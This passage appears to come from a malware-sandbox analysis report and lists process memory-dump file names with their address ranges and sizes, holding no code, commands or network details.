                                                                                                                                                                                  • memory/4636-274-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/4656-366-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/4736-369-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/4740-350-0x00000000050E0000-0x00000000050E1000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    4KB

                                                                                                                                                                                  • memory/4740-332-0x0000000005030000-0x0000000005031000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    4KB

                                                                                                                                                                                  • memory/4740-343-0x00000000050B0000-0x00000000050B1000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    4KB

                                                                                                                                                                                  • memory/4740-319-0x0000000002320000-0x000000000235C000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    240KB

                                                                                                                                                                                  • memory/4740-349-0x00000000050D0000-0x00000000050D1000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    4KB

                                                                                                                                                                                  • memory/4740-323-0x0000000005000000-0x0000000005001000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    4KB

                                                                                                                                                                                  • memory/4740-326-0x0000000005010000-0x0000000005011000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    4KB

                                                                                                                                                                                  • memory/4740-306-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/4740-345-0x00000000050C0000-0x00000000050C1000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    4KB

                                                                                                                                                                                  • memory/4740-342-0x00000000050A0000-0x00000000050A1000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    4KB

                                                                                                                                                                                  • memory/4740-330-0x0000000005020000-0x0000000005021000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    4KB

                                                                                                                                                                                  • memory/4740-320-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    4KB

                                                                                                                                                                                  • memory/4740-341-0x0000000005090000-0x0000000005091000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    4KB

                                                                                                                                                                                  • memory/4740-337-0x0000000005060000-0x0000000005061000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    4KB

                                                                                                                                                                                  • memory/4740-339-0x0000000005070000-0x0000000005071000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    4KB

                                                                                                                                                                                  • memory/4740-335-0x0000000005050000-0x0000000005051000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    4KB

                                                                                                                                                                                  • memory/4740-333-0x0000000005040000-0x0000000005041000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    4KB

                                                                                                                                                                                  • memory/4740-340-0x0000000005080000-0x0000000005081000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    4KB

                                                                                                                                                                                  • memory/4752-245-0x0000000000950000-0x0000000000951000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    4KB

                                                                                                                                                                                  • memory/4752-259-0x0000000005260000-0x0000000005261000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    4KB

                                                                                                                                                                                  • memory/4752-227-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/4760-264-0x0000000005700000-0x0000000005701000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    4KB

                                                                                                                                                                                  • memory/4760-228-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/4760-263-0x0000000001570000-0x0000000001571000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    4KB

                                                                                                                                                                                  • memory/4760-268-0x0000000005C10000-0x0000000005C11000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    4KB

                                                                                                                                                                                  • memory/4760-253-0x0000000000C30000-0x0000000000C31000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    4KB

                                                                                                                                                                                  • memory/4760-256-0x00000000054A0000-0x00000000054A1000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    4KB

                                                                                                                                                                                  • memory/4776-229-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/4832-291-0x0000000000400000-0x0000000002C81000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    40.5MB

                                                                                                                                                                                  • memory/4832-234-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/4832-270-0x00000000048C0000-0x000000000490A000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    296KB

                                                                                                                                                                                  • memory/4840-235-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/4876-238-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/4876-269-0x0000000002D50000-0x0000000002D5A000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    40KB

                                                                                                                                                                                  • memory/4900-299-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/4912-355-0x0000000005CE0000-0x0000000005CE1000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    4KB

                                                                                                                                                                                  • memory/4912-289-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/4912-336-0x0000000000D20000-0x0000000000D21000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    4KB

                                                                                                                                                                                  • memory/4964-354-0x0000000002C80000-0x0000000002DCA000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    1.3MB

                                                                                                                                                                                  • memory/4964-295-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/4968-371-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/4968-373-0x0000000000400000-0x000000000067D000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    2.5MB

                                                                                                                                                                                  • memory/4996-244-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/5028-375-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/5052-314-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/5144-383-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/5200-384-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/5236-385-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/5236-386-0x0000000000380000-0x0000000000381000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    4KB

                                                                                                                                                                                  • memory/5236-394-0x00000000009B0000-0x00000000009DC000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    176KB

                                                                                                                                                                                  • memory/5276-402-0x0000000005080000-0x00000000050AB000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    172KB

                                                                                                                                                                                  • memory/5276-387-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/5276-395-0x0000000000830000-0x0000000000831000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    4KB

                                                                                                                                                                                  • memory/5304-389-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/5340-390-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/5364-392-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/5508-399-0x0000000000400000-0x0000000000455000-memory.dmp
                                                                                                                                                                                    Filesize

                                                                                                                                                                                    340KB

                                                                                                                                                                                  • memory/5508-397-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/5648-403-0x0000000000000000-mapping.dmp
                                                                                                                                                                                  • memory/5900-420-0x0000000000000000-mapping.dmp